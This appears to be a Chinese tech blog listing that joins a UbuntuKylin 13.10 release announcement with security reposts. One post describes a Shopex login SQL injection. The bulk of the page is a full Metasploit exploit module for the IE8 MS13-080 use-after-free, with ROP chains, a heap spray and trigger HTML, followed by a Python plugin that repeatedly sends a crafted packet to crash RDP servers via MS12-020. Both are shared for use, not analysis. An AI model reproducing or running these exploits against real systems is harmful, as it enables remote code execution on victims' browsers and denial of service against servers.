分类 技术类 下的文章

中国版 UbuntuKylin 13.10 麒麟中文版操作系统发布下载 (Ubuntu天朝定制版)

知名的 Linux 操作系统发行版 Ubuntu 于今天发布了中国定制版的操作系统 —— UbuntuKylin (麒麟)。这是Canonical公司与我国工信部软件与集成电路促进中心、国防科技大学组建的CCN开源创新联合实验室开发的。

UbuntuKylin 在 Ubuntu 原版的基础上进行了大量的本地化工作 (如内置天气、农历日历、音乐搜索等) 而来的衍生版,也是 Ubuntu 社区官方认可的操作系统,CCN是完全按照开源的模式来打造的这款产品。日后 Ubuntu 麒麟将会加入更多的中国特色功能,如中文输入法、地图、集成WPS、网银支付等应用……

UbuntuKylin 操作系统简介:

UbuntuKylin 麒麟 是基于原版的 Ubuntu 桌面版而来,是官方认可的衍生版本,所以在 Ubuntu 新版本中所增加的新特性麒麟同样会拥有。

UbuntuKylin 麒麟操作系统

根据官方的消息称,UbuntuKylin 将会在更多的地方做出专为国人使用的定制功能,譬如中文输入法、集成WPS 办公套件、网银支付等。此外,UbuntuKylin 也将可能会与戴尔、惠普等公司合作推出内置该系统的产品。未来还将会将其拓展到其他的平台,包括云端、服务器,平板和智能手机等。

UbuntuKylin 麒麟操作系统

由于 UbuntuKylin 被打上了“国家”的标签,很多人表示这项目有X经费之嫌等等,这点不在本站的讨论范围,但不管怎样,凡事都有多面性,麒麟的出现肯定也会对国内 Linux (Ubuntu) 的普及带来积极的作用的。希望日后这个CCN联盟真能做出更多适合国人使用的特色功能吧,如果你现在已经对其有兴趣,那么也可以下载回去试试看。

UbuntuKylin 麒麟操作系统

UbuntuKylin 麒麟操作系统

UbuntuKylin 麒麟操作系统

PS:首次试用的同学可以先用 VMWare、VirtualBox 等虚拟机软件进行测试,减少安装多系统或重装系统带来的麻烦。当然,如果你打算长期使用的话,还是建议原生安装,这样才会有更高性能和更流畅的使用体验。

相关文件下载地址:

官方网站:访问
软件性质:免费

Shopex后台登录页面注入漏洞附利用POC

对登录时传递的某参数未做过滤,导致注入的产生

最近做二次开发的时候看到了登录的流程
发现在文件shopexcoreadmincontrollerctl.passport.php  (代码 省略)
处理了验证码,管理帐号和密码,但是在最底下发现一个sess_id
没做处理。直接导致sql注入产生。还在学php,分析错的地方请指正

MS13-080 exploit 附Poc

说明:此exp在土司论坛看到的,其他各大论坛均未发布,特转载和基友们分享下。

在msf下使用,目前msf还未更新此漏洞exp。

测试通过,WIN7+office2007/2010/java+IE8和WinXP+IE8

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
include Msf::Exploit::Remote::BrowserAutopwn

autopwn_info({
:ua_name    => HttpClients::IE,
:ua_minver  => "8.0",
:ua_maxver  => "8.0",
:javascript => true,
:os_name    => OperatingSystems::WINDOWS,
:rank       => NormalRanking
})

def initialize(info={})
super(update_info(info,
'Name'           => "MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free",
'Description'    => %q{
This module exploits a vulnerability found in Microsoft Internet Explorer. It was originally
found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP,
around the same time frame as CVE-2013-3893, except this was kept out of the public eye by
multiple research companies and the vendor until the October patch release.

This issue is a use-after-free vulnerability in CDisplayPointer via the use of a
"onpropertychange" event handler. To setup the appropriate buggy conditions, we first craft
the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element.
If we use a select() function for the CTextArea element, two important things will happen:
a CDisplayPointer object will be created for CTextArea, and it will also trigger another
event called "onselect". The "onselect" event will allow us to setup for the actual event
handler we want to abuse - the "onpropertychange" event. Since the CBlockElement is a child
of CTextArea, if we do a node swap of CBlockElement in "onselect", this will trigger
"onpropertychange".  During "onpropertychange" event handling, a free of the CDisplayPointer
object can be forced by using an "Unslect" (other approaches also apply), but a reference
of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after
the CDoc::GetLineInfo call, because it is still trying to use that to update
CDisplayPointer's position. When this invalid reference arrives in QIClassID, a crash
finally occurs due to accessing the freed memory. By controlling this freed memory, it is
possible to achieve arbitrary code execution under the context of the user.
},
'License'        => MSF_LICENSE,
'Author'         =>
[
'Unknown', # Exploit in the wild
'sinn3r'   # Metasploit
],
'References'     =>
[
[ 'CVE', '2013-3897' ],
[ 'OSVDB', '98207' ],
[ 'MSB', 'MS13-080' ],
[ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/10/08/ms13-080-addresses-two-vulnerabilities-under-limited-targeted-attacks.aspx' ],
[ 'URL', 'http://jsunpack.jeek.org/?report=847afb154a4e876d61f93404842d9a1b93a774fb' ]
],
'Platform'       => 'win',
'Targets'        =>
[
[ 'Automatic', {} ],
[ 'IE 8 on Windows XP SP3', {} ],
[ 'IE 8 on Windows 7',      {} ]
],
'Payload'        =>
{
'BadChars'       => "x00",
'PrependEncoder' => "x81xc4x0cxfexffxff" # add esp, -500
},
'DefaultOptions'  =>
{
'InitialAutoRunScript' => 'migrate -f'
},
'Privileged'     => false,
# Jsunpack first received a sample to analyze on Sep 12 2013.
# MSFT patched this on Oct 8th.
'DisclosureDate' => "Oct 08 2013",
'DefaultTarget'  => 0))
end

def get_check_html
%Q|<html>
<script>
#{js_os_detect}

function os() {
var detect = window.os_detect.getVersion();
var os_string = detect.os_name + " " + detect.os_flavor + " " + detect.ua_name + " " + detect.ua_version;
return os_string;
}

function dll() {
var checka = 0;
var checkb = 0;
try {
checka = new ActiveXObject("SharePoint.OpenDocuments.4");
} catch (e) {}

try {
checkb = new ActiveXObject("SharePoint.OpenDocuments.3");
} catch (e) {}

if ((typeof checka) == "object" && (typeof checkb) == "object") {
try{location.href='ms-help://'} catch(e){}
return "#{@js_office_2010_str}";
}
else if ((typeof checka) == "number" && (typeof checkb) == "object") {
try{location.href='ms-help://'} catch(e){}
return "#{@js_office_2007_str}";
}
return "#{@js_default_str}";
}

window.onload = function() {
window.location = "#{get_resource}/search?o=" + escape(os()) + "&d=" + dll();
}
</script>
</html>
|
end

def junk
rand_text_alpha(4).unpack("V")[0].to_i
end

def get_payload(target_info)
rop_payload = ''
os          = target_info[:os]
dll_used    = ''

case target_info[:dll]
when @js_office_2007_str
dll_used = "Office 2007"

pivot =
[
0x51c2213f, # xchg eax,esp # popad # add byte ptr [eax],al # retn 4
junk,       # ESI due to POPAD
junk,       # EBP due to POPAD
junk,
junk,       # EBX due to POPAD
junk,       # EDX due to POPAD
junk,       # ECX due to POPAD
0x51c5d0a7, # EAX due to POPAD (must be writable for the add instruction)
0x51bd81db, # ROP NOP
junk        # Padding for the retn 4 from the stack pivot
].pack("V*")

rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2007', 'pivot'=>pivot})

when @js_office_2010_str
dll_used = "Office 2010"

pivot =
[
0x51c00e64, # xchg eax, esp; add eax, [eax]; add esp, 10; mov eax,esi; pop esi; pop ebp; retn 4
junk,
junk,
junk,
junk,
junk,
0x51BE7E9A, # ROP NOP
junk        # Padding for the retn 4 from the stack pivot
].pack("V*")

rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>pivot})

when @js_default_str
if target_info[:os] =~ /windows xp/i
# XP uses msvcrt.dll
dll_used = "msvcrt"

pivot =
[
0x77C3868A # xchg eax,esp; rcr [ebx-75], 0c1h; pop ebp; ret
].pack("V*")

rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp', 'pivot'=>pivot})
else
# Assuming this is Win 7, and we'll use Java 6 ROP
dll_used = "Java"

pivot =
[
0x7c342643, # xchg eax,esp # pop edi # add byte ptr [eax],al # pop ecx # retn
junk        # Padding for the POP ECX
].pack("V*")

rop_payload = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot})
end
end

print_status("Target uses #{os} with #{dll_used} DLL")

rop_payload
end

def get_sploit_html(target_info)
os         = target_info[:os]
js_payload = ''

if os =~ /Windows (7|XP) MSIE 8.0/
js_payload = Rex::Text.to_unescape(get_payload(target_info))
else
print_error("Target not supported by this attack.")
return ""
end

%Q|<html>
<head>
<script>
#{js_property_spray}
sprayHeap({shellcode:unescape("#{js_payload}")});

var earth = document;
var data = "";
for (i=0; i<17; i++) {
if (i==7) { data += unescape("%u2020%u2030"); }
else      { data += "u4141u4141"; }
}
data += "u4141";

function butterfly() {
for(i=0; i<20; i++) {
var effect = earth.createElement("div");
effect.className = data;
}
}

function kaiju() {
var godzilla = earth.createElement("textarea");
var minilla = earth.createElement("pre");
earth.body.appendChild(godzilla);
earth.body.appendChild(minilla);
godzilla.appendChild(minilla);

godzilla.onselect=function(e) {
minilla.swapNode(earth.createElement("div"));
}

var battleStation = false;
var war = new Array();
godzilla.onpropertychange=function(e) {
if (battleStation == true) {
for (i=0; i<50; i++) {
war.push(earth.createElement("span"));
}
}

earth.execCommand("Unselect");

if (battleStation == true) {
for (i=0; i < war.length; i++) {
war[i].className = data;
}
}
else {
battleStation = true;
}
}

butterfly();
godzilla.select();
}
</script>
</head>
<body onload='kaiju()'>
</body>
</html>
|
end
def on_request_uri(cli, request)
if request.uri =~ /search?o=(.+)&d=(.+)$/
target_info = { :os => Rex::Text.uri_decode($1), :dll => Rex::Text.uri_decode($2) }
sploit = get_sploit_html(target_info)
send_response(cli, sploit, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
return
end

html = get_check_html
print_status("Checking out target...")
send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
end

def exploit
@js_office_2007_str = Rex::Text.rand_text_alpha(4)
@js_office_2010_str = Rex::Text.rand_text_alpha(5)
@js_default_str     = Rex::Text.rand_text_alpha(6)
super
end

end
=begin

+hpa this for debugging or you might not see a crash at all :-)

0:005> r
eax=d6091326 ebx=0777efd4 ecx=00000578 edx=000000c8 esi=043bbfd0 edi=043bbf9c
eip=6d6dc123 esp=043bbf7c ebp=043bbfa0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
mshtml!QIClassID+0x30:
6d6dc123 8b03            mov     eax,dword ptr [ebx]  ds:0023:0777efd4=????????
0:005> u
mshtml!QIClassID+0x30:
6d6dc123 8b03            mov     eax,dword ptr [ebx]
6d6dc125 8365e800        and     dword ptr [ebp-18h],0
6d6dc129 8d4de8          lea     ecx,[ebp-18h]
6d6dc12c 51              push    ecx
6d6dc12d 6870c16d6d      push    offset mshtml!IID_IProxyManager (6d6dc170)
6d6dc132 53              push    ebx
6d6dc133 bf02400080      mov     edi,80004002h
6d6dc138 ff10            call    dword ptr [eax]

=end

 

 

附 微软安全公告: http://technet.microsoft.com/zh-tw/security/bulletin/ms13-080
PoC: http://pan.baidu.com/s/1mpeby
个人感觉PoC上的触发略鸡肋...
两个PoC, 我稍微改了下, 还是算转载吧, 对应CVE-2013-3893和3897, 内含福利, 测试请自备纸巾

ms12020 远程3389蓝屏攻击插件py版本

以下代码 保存为 qingms12020.py

传送门:http://mstoor.duapp.com/view/?pid=16

[code lang="js"]
# -*- coding: cp936 -*-
'''
mst=>plugin=>exploit
ms12_020
'''
from socket import *
class mstplugin:
'''ms12_020'''
infos = [
['插件','ms12_020 远程3389蓝屏Exploit'],
['作者','mst'],
['更新','2013/10/22'],
['网址','http://mstoor.duapp.com/']
]
opts = [
['RHOST','192.168.1.2','REMOTE HOST'],
['RPORT','3389','REMOTE PORT'],
['TIMES','100','SEND BUF TIMES'],
['TIMEOUT','5','SOCK SETTIMEOUT'],
['PAYLOAD','false','NO RETURN PAYLOAD']
]
buf=""
buf+="x03x00x00x13x0exe0x00x00"
buf+="x00x00x00x01x00x08x00x00"
buf+="x00x00x00x03x00x01xd6x02"
buf+="xf0x80x7fx65x82x01x94x04"
buf+="x01x01x04x01x01x01x01xff"
buf+="x30x19x02x04x00x00x00x00"
buf+="x02x04x00x00x00x02x02x04"
buf+="x00x00x00x00x02x04x00x00"
buf+="x00x01x02x04x00x00x00x00"
buf+="x02x04x00x00x00x01x02x02"
buf+="xffxffx02x04x00x00x00x02"
buf+="x30x19x02x04x00x00x00x01"
buf+="x02x04x00x00x00x01x02x04"
buf+="x00x00x00x01x02x04x00x00"
buf+="x00x01x02x04x00x00x00x00"
buf+="x02x04x00x00x00x01x02x02"
buf+="x04x20x02x04x00x00x00x02"
buf+="x30x1cx02x02xffxffx02x02"
buf+="xfcx17x02x02xffxffx02x04"
buf+="x00x00x00x01x02x04x00x00"
buf+="x00x00x02x04x00x00x00x01"
buf+="x02x02xffxffx02x04x00x00"
buf+="x00x02x04x82x01x33x00x05"
buf+="x00x14x7cx00x01x81x2ax00"
buf+="x08x00x10x00x01xc0x00x44"
buf+="x75x63x61x81x1cx01xc0xd8"
buf+="x00x04x00x08x00x80x02xe0"
buf+="x01x01xcax03xaax09x04x00"
buf+="x00xcex0ex00x00x48x00x4f"
buf+="x00x53x00x54x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x04x00x00"
buf+="x00x00x00x00x00x0cx00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x01xcax01x00x00x00x00"
buf+="x00x10x00x07x00x01x00x30"
buf+="x00x30x00x30x00x30x00x30"
buf+="x00x2dx00x30x00x30x00x30"
buf+="x00x2dx00x30x00x30x00x30"
buf+="x00x30x00x30x00x30x00x30"
buf+="x00x2dx00x30x00x30x00x30"
buf+="x00x30x00x30x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x04xc0x0c"
buf+="x00x0dx00x00x00x00x00x00"
buf+="x00x02xc0x0cx00x1bx00x00"
buf+="x00x00x00x00x00x03xc0x2c"
buf+="x00x03x00x00x00x72x64x70"
buf+="x64x72x00x00x00x00x00x80"
buf+="x80x63x6cx69x70x72x64x72"
buf+="x00x00x00xa0xc0x72x64x70"
buf+="x73x6ex64x00x00x00x00x00"
buf+="xc0x03x00x00x0cx02xf0x80"
buf+="x04x01x00x01x00x03x00x00"
buf+="x08x02xf0x80x28x03x00x00"
buf+="x0cx02xf0x80x38x00x06x03"
buf+="xefx03x00x00x0cx02xf0x80"
buf+="x38x00x06x03xebx03x00x00"
buf+="x0cx02xf0x80x38x00x06x03"
buf+="xecx03x00x00x0cx02xf0x80"
buf+="x38x00x06x03xedx03x00x00"
buf+="x0cx02xf0x80x38x00x06x03"
buf+="xeex03x00x00x0bx06xd0x00"
buf+="x00x12x34x00"
def exploit(self):
'''start exploit'''
color.cprint("[+] Connect to %s .."%RHOST,YELLOW)
for i in range(int(TIMES)):
s=socket(AF_INET,SOCK_STREAM)
s.settimeout(int(TIMEOUT))
try:
s.connect((RHOST,int(RPORT)))
color.cprint("[+] Send %-5s Bytes.."%len(self.buf),GREEN)
s.send(self.buf)
rec=s.recv(100)
color.cprint("[+] Recv %-5s Bytes.."%len(rec),YELLOW)
s.close()
except Exception,e:
color.cprint("[!] Exploit False !CODE:%s"%e,RED)

[/code]